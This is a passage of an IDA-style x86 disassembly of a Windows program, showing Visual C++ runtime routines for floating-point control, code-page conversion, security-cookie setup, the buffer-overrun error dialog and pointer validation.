cmp eax, ebx
jnz short loc_41DD22
cmp edx, ebx
jnz short loc_41DD22
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41DD6F
; ---------------------------------------------------------------------------
loc_41DD22: ; CODE XREF: sub_41DCBA+54�j
; sub_41DCBA+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41DD2B: ; CODE XREF: sub_41DCBA+47�j
; sub_41DCBA+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_41DD66
loc_41DD47: ; CODE XREF: sub_41DCBA+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_41DD47
loc_41DD66: ; CODE XREF: sub_41DCBA+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41DD6F: ; CODE XREF: sub_41DCBA+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DCBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD74 proc near ; CODE XREF: sub_419951+23�p
; sub_419A61+22�p ...
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41DCBA
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_41EDA1
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_2A]
mov [esi], eax
movsx eax, [ebp+var_2C]
mov [esi+4], eax
lea eax, [ebp+var_28]
push eax
push edi
call sub_419C40
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
call sub_41A1F6
pop edi
pop esi
leave
retn
sub_41DD74 endp
; =============== S U B R O U T I N E =======================================
sub_41DDE6 proc near ; CODE XREF: sub_416662+43E�p
; sub_416662+459�p ...
push 2
call sub_4162A0
pop ecx
retn
sub_41DDE6 endp
; =============== S U B R O U T I N E =======================================
sub_41DDEF proc near ; CODE XREF: sub_41DF0F+C�p
xor eax, eax
test bl, 1
jz short loc_41DDF9
push 10h
pop eax
loc_41DDF9: ; CODE XREF: sub_41DDEF+5�j
test bl, 4
jz short loc_41DE01
or eax, 8
loc_41DE01: ; CODE XREF: sub_41DDEF+D�j
test bl, 8
jz short loc_41DE09
or eax, 4
loc_41DE09: ; CODE XREF: sub_41DDEF+15�j
test bl, 10h
jz short loc_41DE11
or eax, 2
loc_41DE11: ; CODE XREF: sub_41DDEF+1D�j
test bl, 20h
jz short loc_41DE19
or eax, 1
loc_41DE19: ; CODE XREF: sub_41DDEF+25�j
test bl, 2
jz short loc_41DE23
or eax, 80000h
loc_41DE23: ; CODE XREF: sub_41DDEF+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_41DE5F
cmp ecx, 400h
jz short loc_41DE5A
cmp ecx, 800h
jz short loc_41DE56
cmp ecx, esi
jnz short loc_41DE5F
or eax, edi
jmp short loc_41DE5F
; ---------------------------------------------------------------------------
loc_41DE56: ; CODE XREF: sub_41DDEF+5D�j
or eax, ebp
jmp short loc_41DE5F
; ---------------------------------------------------------------------------
loc_41DE5A: ; CODE XREF: sub_41DDEF+55�j
or eax, 100h
loc_41DE5F: ; CODE XREF: sub_41DDEF+4D�j
; sub_41DDEF+61�j ...
and edx, edi
jz short loc_41DE6E
cmp edx, ebp
jnz short loc_41DE73
or eax, 10000h
jmp short loc_41DE73
; ---------------------------------------------------------------------------
loc_41DE6E: ; CODE XREF: sub_41DDEF+72�j
or eax, 20000h
loc_41DE73: ; CODE XREF: sub_41DDEF+76�j
; sub_41DDEF+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_41DE80
or eax, 40000h
locret_41DE80: ; CODE XREF: sub_41DDEF+8A�j
retn
sub_41DDEF endp
; =============== S U B R O U T I N E =======================================
sub_41DE81 proc near ; CODE XREF: sub_41DF0F+22�p
xor eax, eax
test bl, 10h
jz short loc_41DE89
inc eax
loc_41DE89: ; CODE XREF: sub_41DE81+5�j
test bl, 8
jz short loc_41DE91
or eax, 4
loc_41DE91: ; CODE XREF: sub_41DE81+B�j
test bl, 4
jz short loc_41DE99
or eax, 8
loc_41DE99: ; CODE XREF: sub_41DE81+13�j
test bl, 2
jz short loc_41DEA1
or eax, 10h
loc_41DEA1: ; CODE XREF: sub_41DE81+1B�j
test bl, 1
jz short loc_41DEA9
or eax, 20h
loc_41DEA9: ; CODE XREF: sub_41DE81+23�j
test ebx, 80000h
jz short loc_41DEB4
or eax, 2
loc_41DEB4: ; CODE XREF: sub_41DE81+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_41DEE8
cmp ecx, 100h
jz short loc_41DEE3
cmp ecx, esi
jz short loc_41DEDC
cmp ecx, edx
jnz short loc_41DEE8
or eax, 0C00h
jmp short loc_41DEE8
; ---------------------------------------------------------------------------
loc_41DEDC: ; CODE XREF: sub_41DE81+4E�j
or eax, 800h
jmp short loc_41DEE8
; ---------------------------------------------------------------------------
loc_41DEE3: ; CODE XREF: sub_41DE81+4A�j
or eax, 400h
loc_41DEE8: ; CODE XREF: sub_41DE81+42�j
; sub_41DE81+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41DEFE
cmp ecx, 10000h
jnz short loc_41DF00
or eax, esi
jmp short loc_41DF00
; ---------------------------------------------------------------------------
loc_41DEFE: ; CODE XREF: sub_41DE81+6F�j
or eax, edx
loc_41DF00: ; CODE XREF: sub_41DE81+77�j
; sub_41DE81+7B�j
test ebx, 40000h
pop esi
jz short locret_41DF0E
or eax, 1000h
locret_41DF0E: ; CODE XREF: sub_41DE81+86�j
retn
sub_41DE81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF0F proc near ; CODE XREF: sub_41DF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_41DDEF
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_41DE81
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_41DF0F endp
; =============== S U B R O U T I N E =======================================
sub_41DF41 proc near ; CODE XREF: sub_419BBA+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41DF0F
pop ecx
pop ecx
retn
sub_41DF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF57 proc near ; CODE XREF: sub_419E09+27D�p
; sub_41C5B0+15E�p ...
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
and [ebp+var_6], 0
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
call ds:dword_42011C ; GetLocaleInfoA
test eax, eax
jnz short loc_41DF89
or eax, 0FFFFFFFFh
jmp short loc_41DF93
; ---------------------------------------------------------------------------
loc_41DF89: ; CODE XREF: sub_41DF57+2B�j
lea eax, [ebp+var_C]
push eax
call sub_4148EA
pop ecx
loc_41DF93: ; CODE XREF: sub_41DF57+30�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41A1F6
leave
retn
sub_41DF57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DFA0 proc near ; CODE XREF: sub_419E09+2A8�p
; sub_419E09+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_429AE0
call __SEH_prolog
mov eax, dword_42DEA8
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_41E149
lea ecx, [ebp+var_40]
push ecx
push eax
mov esi, ds:dword_4201B0
call esi ; GetCPInfo
test eax, eax
jz short loc_41E007
cmp [ebp+var_40], 1
jnz short loc_41E007
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_41E007
cmp [ebp+var_40], 1
jnz short loc_41E007
mov [ebp+var_2C], 1
loc_41E007: ; CODE XREF: sub_41DFA0+45�j
; sub_41DFA0+4B�j ...
cmp [ebp+var_2C], edi
jz short loc_41E026
cmp ebx, 0FFFFFFFFh
jz short loc_41E015
mov esi, ebx
jmp short loc_41E021
; ---------------------------------------------------------------------------
loc_41E015: ; CODE XREF: sub_41DFA0+6F�j
push [ebp+arg_8]
call sub_4179C0
pop ecx
mov esi, eax
inc esi
loc_41E021: ; CODE XREF: sub_41DFA0+73�j
mov [ebp+var_44], esi
jmp short loc_41E029
; ---------------------------------------------------------------------------
loc_41E026: ; CODE XREF: sub_41DFA0+6A�j
mov esi, [ebp+var_44]
loc_41E029: ; CODE XREF: sub_41DFA0+84�j
cmp [ebp+var_2C], edi
jnz short loc_41E048
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_4200D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_44], esi
cmp esi, edi
jz short loc_41E0A0
loc_41E048: ; CODE XREF: sub_41DFA0+8C�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_41C550
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41E08C
; ---------------------------------------------------------------------------
loc_41E075: ; DATA XREF: .rdata:stru_429AE0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41E079: ; DATA XREF: .rdata:stru_429AE0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_44]
loc_41E08C: ; CODE XREF: sub_41DFA0+D3�j
cmp ebx, edi
jnz short loc_41E0AE
push esi
push 2
call sub_41C280
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_41E0A7
loc_41E0A0: ; CODE XREF: sub_41DFA0+A6�j
xor eax, eax
jmp loc_41E15B
; ---------------------------------------------------------------------------
loc_41E0A7: ; CODE XREF: sub_41DFA0+FE�j
mov [ebp+var_24], 1
loc_41E0AE: ; CODE XREF: sub_41DFA0+EE�j
push esi
push ebx
push [ebp+var_28]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jz loc_41E14C
cmp [ebp+arg_10], edi
jz short loc_41E0EE
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_4200D8 ; WideCharToMultiByte
test eax, eax
jz short loc_41E14C
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
jmp short loc_41E14C
; ---------------------------------------------------------------------------
loc_41E0EE: ; CODE XREF: sub_41DFA0+12C�j
cmp [ebp+var_2C], edi
jnz short loc_41E109
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_4200D8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_41E14C
loc_41E109: ; CODE XREF: sub_41DFA0+151�j
push esi
push 1
call sub_41C280
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_41E14C
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_4200D8 ; WideCharToMultiByte
cmp eax, edi
jnz short loc_41E13C
push [ebp+var_20]
call sub_414A14
pop ecx
mov [ebp+var_20], edi
jmp short loc_41E14C
; ---------------------------------------------------------------------------
loc_41E13C: ; CODE XREF: sub_41DFA0+18C�j
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_41E14C
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_41E14C
; ---------------------------------------------------------------------------
loc_41E149: ; CODE XREF: sub_41DFA0+30�j
mov ebx, [ebp+var_48]
loc_41E14C: ; CODE XREF: sub_41DFA0+123�j
; sub_41DFA0+144�j ...
cmp [ebp+var_24], edi
jz short loc_41E158
push ebx
call sub_414A14
pop ecx
loc_41E158: ; CODE XREF: sub_41DFA0+1AF�j
mov eax, [ebp+var_20]
loc_41E15B: ; CODE XREF: sub_41DFA0+102�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41A1F6
call __SEH_epilog
retn
sub_41DFA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E16F proc near ; DATA XREF: .data:0042B004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_42015C ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_4200F8 ; GetCurrentProcessId
xor esi, eax
call ds:dword_420174 ; GetCurrentThreadId
xor esi, eax
call ds:dword_420004 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_42DEA8, esi
jnz short loc_41E1C2
mov dword_42DEA8, 0BB40E64Eh
loc_41E1C2: ; CODE XREF: sub_41E16F+47�j
pop esi
leave
retn
sub_41E16F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1C5 proc near ; CODE XREF: sub_41A1F6-1D�p
var_140 = dword ptr -140h
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_429C90
call __SEH_prolog
mov eax, dword_42DEA8
xor eax, [ebp+4]
mov [ebp+var_1C], eax
mov eax, dword_47C504
xor ecx, ecx
cmp eax, ecx
jz short loc_41E209
mov [ebp+ms_exc.disabled], ecx
push [ebp+arg_4]
push [ebp+arg_0]
call eax
pop ecx
pop ecx
loc_41E1F7: ; CODE XREF: sub_41E1C5+42�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_41E307
; ---------------------------------------------------------------------------
loc_41E200: ; DATA XREF: .rdata:stru_429C90�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41E204: ; DATA XREF: .rdata:stru_429C90�o
mov esp, [ebp+ms_exc.old_esp]
jmp short loc_41E1F7
; ---------------------------------------------------------------------------
loc_41E209: ; CODE XREF: sub_41E1C5+23�j
mov eax, [ebp+arg_0]
dec eax
jz short loc_41E222
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov [ebp+var_20], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_41E233
; ---------------------------------------------------------------------------
loc_41E222: ; CODE XREF: sub_41E1C5+48�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov [ebp+var_20], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_41E233: ; CODE XREF: sub_41E1C5+5B�j
mov [ebp+var_24], cl
push 104h
lea eax, [ebp+var_128]
push eax
push ecx
call ds:dword_420010 ; GetModuleFileNameA
test eax, eax
jnz short loc_41E260
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp+var_128]
push eax
call sub_419C40
pop ecx
pop ecx
loc_41E260: ; CODE XREF: sub_41E1C5+86�j
lea ebx, [ebp+var_128]
lea eax, [ebp+var_128]
push eax
call sub_4179C0
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_41E2A4
lea eax, [ebp+var_128]
push eax
call sub_4179C0
mov ebx, eax
lea eax, [ebp+var_128]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_414670
add esp, 10h
loc_41E2A4: ; CODE XREF: sub_41E1C5+B4�j
push ebx
call sub_4179C0
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
push edi
push esi
call sub_419C40
mov edi, offset asc_4298F0 ; "\n\n"
push edi
push esi
call sub_419C50
push offset dword_429AEC
push esi
call sub_419C50
push ebx
push esi
call sub_419C50
push edi
push esi
call sub_419C50
push [ebp+var_20]
push esi
call sub_419C50
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_41E453
add esp, 3Ch
loc_41E307: ; CODE XREF: sub_41E1C5+36�j
push 3
call sub_4160A4
int 3 ; Trap to Debugger
loc_41E30F: ; DATA XREF: sub_41E355�o
; .data:0042DEAC�o
push esi
mov esi, [esp+148h+var_140]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41E332
cmp dword ptr [eax+10h], 3
jnz short loc_41E332
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41E332
call sub_41AA6F
loc_41E332: ; CODE XREF: sub_41E1C5+157�j
; sub_41E1C5+15D�j ...
mov eax, dword_47C508
test eax, eax
jz short loc_41E34F
push eax
call sub_41E3AD
test eax, eax
pop ecx
jz short loc_41E34F
push esi
call dword_47C508
jmp short loc_41E351
; ---------------------------------------------------------------------------
loc_41E34F: ; CODE XREF: sub_41E1C5+174�j
; sub_41E1C5+17F�j
xor eax, eax
loc_41E351: ; CODE XREF: sub_41E1C5+188�j
pop esi
retn 4
sub_41E1C5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E355 proc near ; DATA XREF: .data:0042B01C�o
push offset loc_41E30F
call ds:dword_420144 ; SetUnhandledExceptionFilter
mov dword_47C508, eax
xor eax, eax
retn
sub_41E355 endp
; =============== S U B R O U T I N E =======================================
sub_41E368 proc near ; DATA XREF: .data:0042B034�o
push dword_47C508
call ds:dword_420144 ; SetUnhandledExceptionFilter
retn
sub_41E368 endp
; =============== S U B R O U T I N E =======================================
sub_41E375 proc near ; CODE XREF: sub_41A548+53�p
; sub_41A548+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_420140 ; IsBadReadPtr
test eax, eax
jz short loc_41E38D
xor esi, esi
loc_41E38D: ; CODE XREF: sub_41E375+14�j
mov eax, esi
pop esi
retn
sub_41E375 endp
; =============== S U B R O U T I N E =======================================
sub_41E391 proc near ; CODE XREF: sub_41A548+65�p
; sub_41A548+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_420194 ; IsBadWritePtr
test eax, eax
jz short loc_41E3A9
xor esi, esi
loc_41E3A9: ; CODE XREF: sub_41E391+14�j
mov eax, esi
pop esi
retn
sub_41E391 endp
; =============== S U B R O U T I N E =======================================
sub_41E3AD proc near ; CODE XREF: sub_41A548+128�p
; sub_41E1C5+177�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call ds:dword_42013C ; IsBadCodePtr
test eax, eax
jz short loc_41E3C1
xor esi, esi
loc_41E3C1: ; CODE XREF: sub_41E3AD+10�j
mov eax, esi
pop esi
retn
sub_41E3AD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AA6F
loc_41E3C5: ; CODE XREF: sub_41AA6F:loc_41AA9F�j
push 0Ah
call sub_41B5C9
push 16h
call sub_41F063
pop ecx
pop ecx
push 3
call sub_4160A4
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41AA6F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E3DD proc near ; CODE XREF: sub_41B1CE+7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_429CA0
call __SEH_prolog
cmp dword_47C980, 3
jnz short loc_41E42C
push 4
call sub_418285
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
push esi
call sub_4182FE
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_41E41A
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_41E41D
; ---------------------------------------------------------------------------
loc_41E41A: ; CODE XREF: sub_41E3DD+30�j
mov esi, [ebp+var_20]
loc_41E41D: ; CODE XREF: sub_41E3DD+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E44A
cmp [ebp+var_1C], 0
jnz short loc_41E43F
loc_41E42C: ; CODE XREF: sub_41E3DD+13�j
push [ebp+arg_0]
push 0
push dword_47C97C
call ds:dword_420138 ; RtlSizeHeap
mov esi, eax
loc_41E43F: ; CODE XREF: sub_41E3DD+4D�j
mov eax, esi
call __SEH_epilog
retn
sub_41E3DD endp
; =============== S U B R O U T I N E =======================================
sub_41E447 proc near ; DATA XREF: .rdata:stru_429CA0�o
mov esi, [ebp-20h]
sub_41E447 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E44A proc near ; CODE XREF: sub_41E3DD+44�p
push 4
call sub_4181F1
pop ecx
retn
sub_41E44A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E453 proc near ; CODE XREF: sub_41B5C9+132�p
; sub_41E1C5+13A�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_47C50C, ebx
push esi
push edi
jnz short loc_41E4D3
push offset aUser32_dll ; "user32.dll"
call ds:dword_420088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_41E50E
mov esi, ds:dword_420084
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_47C50C, eax
jz short loc_41E50E
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_47C510, eax
call esi ; GetProcAddress
cmp dword_47C1A4, 2
mov dword_47C514, eax
jnz short loc_41E4D3
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_47C51C, eax
jz short loc_41E4D3
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_47C518, eax
loc_41E4D3: ; CODE XREF: sub_41E453+11�j
; sub_41E453+60�j ...
mov eax, dword_47C518
test eax, eax
jz short loc_41E518
call eax ; GetProcessWindowStation
test eax, eax
jz short loc_41E4FF
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_47C51C ; GetUserObjectInformationA
test eax, eax
jz short loc_41E4FF
test [ebp+var_8], 1
jnz short loc_41E518
loc_41E4FF: ; CODE XREF: sub_41E453+8D�j
; sub_41E453+A4�j
cmp dword_47C1B0, 4
jb short loc_41E512
or [ebp+arg_A], 20h
jmp short loc_41E537
; ---------------------------------------------------------------------------
loc_41E50E: ; CODE XREF: sub_41E453+22�j
; sub_41E453+3D�j
xor eax, eax
jmp short loc_41E547
; ---------------------------------------------------------------------------
loc_41E512: ; CODE XREF: sub_41E453+B3�j
or [ebp+arg_A], 4
jmp short loc_41E537
; ---------------------------------------------------------------------------
loc_41E518: ; CODE XREF: sub_41E453+87�j
; sub_41E453+AA�j
mov eax, dword_47C510
test eax, eax
jz short loc_41E537
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_41E537
mov eax, dword_47C514
test eax, eax
jz short loc_41E537
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_41E537: ; CODE XREF: sub_41E453+B9�j
; sub_41E453+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_47C50C ; MessageBoxA
loc_41E547: ; CODE XREF: sub_41E453+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E453 endp
; =============== S U B R O U T I N E =======================================
sub_41E54C proc near ; CODE XREF: sub_41E57D+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_47C741[eax], cl
jnz short loc_41E579
cmp [esp+arg_4], 0
jz short loc_41E572
movzx eax, ds:word_4290E2[eax*2]
and eax, [esp+arg_4]
jmp short loc_41E574
; ---------------------------------------------------------------------------
loc_41E572: ; CODE XREF: sub_41E54C+16�j
xor eax, eax
loc_41E574: ; CODE XREF: sub_41E54C+24�j
test eax, eax
jnz short loc_41E579
retn
; ---------------------------------------------------------------------------
loc_41E579: ; CODE XREF: sub_41E54C+F�j
; sub_41E54C+2A�j
xor eax, eax
inc eax
retn
sub_41E54C endp
; =============== S U B R O U T I N E =======================================
sub_41E57D proc near ; CODE XREF: sub_41B8DD+35�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41E54C
add esp, 0Ch
retn
sub_41E57D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E58E proc near ; CODE XREF: sub_41BF3B+54�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_41CD1B
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_41E5BF
call sub_419600
mov dword ptr [eax], 9
jmp short loc_41E5E8
; ---------------------------------------------------------------------------
loc_41E5BF: ; CODE XREF: sub_41E58E+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_420090 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_41E5EE
call ds:dword_420008 ; RtlGetLastWin32Error
test eax, eax
jz short loc_41E5EE
push eax
call sub_419612
pop ecx
loc_41E5E8: ; CODE XREF: sub_41E58E+2F�j
mov eax, edi
mov edx, edi
jmp short loc_41E60D
; ---------------------------------------------------------------------------
loc_41E5EE: ; CODE XREF: sub_41E58E+47�j
; sub_41E58E+51�j
mov eax, esi
sar eax, 5
mov eax, dword_47C620[eax*4]
and esi, 1Fh
lea ecx, [esi+esi*8]
lea eax, [eax+ecx*4+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_41E60D: ; CODE XREF: sub_41E58E+5E�j
pop edi
pop esi
leave
retn
sub_41E58E endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
mov al, 0FFh
mov edi, edi
loc_41E630: ; CODE XREF: .text:0041E640�j
; .text:0041E660�j
or al, al
jz short loc_41E666
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_41E630
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_41E630
sbb al, al
sbb al, 0FFh
loc_41E666: ; CODE XREF: .text:0041E632�j
movsx eax, al
pop ebx
pop esi
